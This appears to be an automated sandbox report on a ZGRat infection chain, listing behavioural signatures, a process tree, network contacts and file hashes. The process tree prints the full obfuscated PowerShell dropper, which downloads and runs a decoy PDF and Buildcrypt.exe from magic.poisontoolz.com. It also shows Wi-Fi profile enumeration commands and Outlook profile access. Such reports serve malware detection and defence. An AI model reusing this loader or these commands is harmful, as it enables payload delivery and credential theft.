| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1000 set thread context of 4664 | N/A | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Docs.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dxkEOJ($jqyPVSgWqmmMsu, $aNoKIHhsKCDNWp){[IO.File]::WriteAllBytes($jqyPVSgWqmmMsu, $aNoKIHhsKCDNWp)};function jjdeCQWVxw($jqyPVSgWqmmMsu){if($jqyPVSgWqmmMsu.EndsWith((sqawNbuSbNoQJZv @(58322,58376,58384,58384))) -eq $True){rundll32.exe $jqyPVSgWqmmMsu }elseif($jqyPVSgWqmmMsu.EndsWith((sqawNbuSbNoQJZv @(58322,58388,58391,58325))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $jqyPVSgWqmmMsu}elseif($jqyPVSgWqmmMsu.EndsWith((sqawNbuSbNoQJZv @(58322,58385,58391,58381))) -eq $True){misexec /qn /i $jqyPVSgWqmmMsu}else{Start-Process $jqyPVSgWqmmMsu}};function HbrgwLHwrnHIIKcXF($PsSShlejHlmIATZ){$DiupfoBkkti = New-Object (sqawNbuSbNoQJZv @(58354,58377,58392,58322,58363,58377,58374,58343,58384,58381,58377,58386,58392));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$aNoKIHhsKCDNWp = $DiupfoBkkti.DownloadData($PsSShlejHlmIATZ);return $aNoKIHhsKCDNWp};function sqawNbuSbNoQJZv($IGSmIy){$qiARGdapNw=58276;$oaVnqUhEZ=$Null;foreach($PnrRNHiYycYQVcn in $IGSmIy){$oaVnqUhEZ+=[char]($PnrRNHiYycYQVcn-$qiARGdapNw)};return $oaVnqUhEZ};function SSSHxFUz(){$SrNKPGroYNNtLyR = $env:AppData + '\';$mVYpdLNFBXXciTDAvNH = $SrNKPGroYNNtLyR + 'Document.pdf';If(Test-Path -Path $mVYpdLNFBXXciTDAvNH){Invoke-Item $mVYpdLNFBXXciTDAvNH;}Else{ $lyGsxYZsmNE = HbrgwLHwrnHIIKcXF (sqawNbuSbNoQJZv @(58380,58392,58392,58388,58391,58334,58323,58323,58385,58373,58379,58381,58375,58322,58388,58387,58381,58391,58387,58386,58392,58387,58387,58384,58398,58322,58375,58387,58385,58323,58344,58387,58375,58393,58385,58377,58386,58392,58322,58388,58376,58378));dxkEOJ $mVYpdLNFBXXciTDAvNH $lyGsxYZsmNE;Invoke-Item $mVYpdLNFBXXciTDAvNH;};$bblLmj = $SrNKPGroYNNtLyR + 'Buildcrypt.exe'; if (Test-Path -Path $bblLmj){jjdeCQWVxw $bblLmj;}Else{ $SlNerqupbdAkKp = HbrgwLHwrnHIIKcXF (sqawNbuSbNoQJZv @(58380,58392,58392,58388,58391,58334,58323,58323,58385,58373,58379,58381,58375,58322,58388,58387,58381,58391,58387,58386,58392,58387,58387,58384,58398,58322,58375,58387,58385,58323,58342,58393,58381,58384,58376,58375,58390,58397,58388,58392,58322,58377,58396,58377));dxkEOJ $bblLmj $SlNerqupbdAkKp;jjdeCQWVxw $bblLmj;};;;;}SSSHxFUz;
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Document.pdf"
C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
"C:\Users\Admin\AppData\Roaming\Buildcrypt.exe"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=B1BA23CBB6B8ADE984E66F02BD8FFBCB --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=B1BA23CBB6B8ADE984E66F02BD8FFBCB --renderer-client-id=2 --mojo-platform-channel-handle=1704 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A4AFFB00DA70C44E89F0006F7A791B52 --mojo-platform-channel-handle=1728 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=0DAD23F905662147322197BCAE29E9B2 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=0DAD23F905662147322197BCAE29E9B2 --renderer-client-id=4 --mojo-platform-channel-handle=2160 --allow-no-sandbox-job /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8F6D819C2C95458AFCD482D7629D9A50 --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9B94B64419BE447393C0FAA7D9D790F7 --mojo-platform-channel-handle=2844 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4F5F8B806EAD2D2C82F04826F782E692 --mojo-platform-channel-handle=2928 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 169.0.37.23.in-addr.arpa | udp |
| US | 13.85.23.86:443 | tcp | |
| US | 8.8.8.8:53 | 23.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.135.233:443 | discordapp.com | tcp |
| US | 104.18.114.97:80 | icanhazip.com | tcp |
| US | 162.159.135.233:443 | discordapp.com | tcp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 152.199.19.74:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 51.11.168.232:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 51.11.168.232:443 | tcp | |
| N/A | 51.11.168.232:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| GB | 104.77.160.31:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 13.85.23.86:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 20.242.39.171:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 13.85.23.86:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 104.18.114.97:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 104.18.114.97:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 51.38.43.18:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 31.14.70.246:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
Files
memory/952-0-0x0000000071B40000-0x00000000722F0000-memory.dmp
memory/952-2-0x0000000002800000-0x0000000002836000-memory.dmp
memory/952-1-0x0000000004D30000-0x0000000004D40000-memory.dmp
memory/952-3-0x0000000005370000-0x0000000005998000-memory.dmp
memory/952-4-0x0000000005180000-0x00000000051A2000-memory.dmp
memory/952-6-0x0000000005AC0000-0x0000000005B26000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4somwvmw.4ed.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/952-5-0x0000000005A50000-0x0000000005AB6000-memory.dmp
memory/952-16-0x0000000005C90000-0x0000000005FE4000-memory.dmp
memory/952-17-0x00000000061B0000-0x00000000061CE000-memory.dmp
memory/952-18-0x0000000006200000-0x000000000624C000-memory.dmp
memory/952-19-0x0000000004D30000-0x0000000004D40000-memory.dmp
memory/952-22-0x0000000006740000-0x0000000006762000-memory.dmp
memory/952-21-0x00000000066D0000-0x00000000066EA000-memory.dmp
memory/952-20-0x0000000007390000-0x0000000007426000-memory.dmp
memory/952-23-0x00000000079E0000-0x0000000007F84000-memory.dmp
memory/952-24-0x0000000008610000-0x0000000008C8A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
| MD5 | 380888258d0c8d18da63e80591a4e0f3 |
| SHA1 | 70ef5767c29304806ccc4cd136d9c5bfd8dcf403 |
| SHA256 | eaaefbc4c960dca1de30c44f0fccbbefdb9c3e0e243e7ff5579316b99206b8e0 |
| SHA512 | 63104e4e2e6b260522c26a28287684bb8dab433d4b03396e30b478288980d15d4d259d873f1f59eda364ec777bcdc79f481b11890178a012f2bc483497c4e3b3 |
memory/1000-40-0x0000000000700000-0x000000000071C000-memory.dmp
memory/1000-41-0x0000000071B40000-0x00000000722F0000-memory.dmp
memory/1000-42-0x0000000005100000-0x0000000005110000-memory.dmp
C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
| MD5 | 1146d3a15130bd2c5fdfae7ea6cd78a3 |
| SHA1 | 0a2a1406b135a5f2b7c57aec1c8cdb53c1b6b22f |
| SHA256 | 0f5890a4dc9f8f4ae0967c8958cf02f70009dd3748268d33c8acf06226cdba2a |
| SHA512 | dd6cebb5b0bf8e06d32da44fd9d1d12ee7c0e88efd0fe80a62f9cc5bc6c0fc8266f9d1ca9883e1f12039e2587a52f8f679d00d7cb506115204435779d6c7dc96 |
C:\Users\Admin\AppData\Roaming\Document.pdf
| MD5 | 80a2593453c09724d152e841a3ff0865 |
| SHA1 | c73c293d18aac71c530d69ea03314f064f5c6386 |
| SHA256 | 71d885fd0734c915b43ed11d45750aa67c53a11d6a95c9c8323d9fd6e3b413cd |
| SHA512 | ff131d439c8e06a789fa82ab7d2640ba87ab03b165f6bbf0d8048baad81c797e45c96000312c37dd5d1a53a2996ce7d3b6ccab09470d52840e4e8344f5b04f67 |
memory/1000-44-0x0000000006A80000-0x0000000006C8A000-memory.dmp
memory/1000-45-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-46-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-48-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-52-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-50-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-54-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-56-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-58-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-62-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-66-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-68-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-70-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-72-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-64-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-74-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-76-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-78-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-80-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-82-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-84-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-86-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-90-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-92-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-94-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-96-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-88-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-60-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-100-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-102-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-98-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-104-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-106-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-108-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/952-655-0x0000000071B40000-0x00000000722F0000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | c26ed30e7d5ab440480838636efc41db |
| SHA1 | c66e0d00b56abebfb60d2fcc5cf85ad31a0d6591 |
| SHA256 | 6a3c5c4a8e57f77ecc22078fbf603ecc31fb82d429bd87b7b4b9261447092aef |
| SHA512 | 96cdb78bca3e01d4513c31661987e5646e6a8ff24708918aa0d66dfa3ca5d98af4862c9f38c4f41f933c345d2d3adfb1d34d1430b33f45f916f41a9872a030df |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | 752a1f26b18748311b691c7d8fc20633 |
| SHA1 | c1f8e83eebc1cc1e9b88c773338eb09ff82ab862 |
| SHA256 | 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131 |
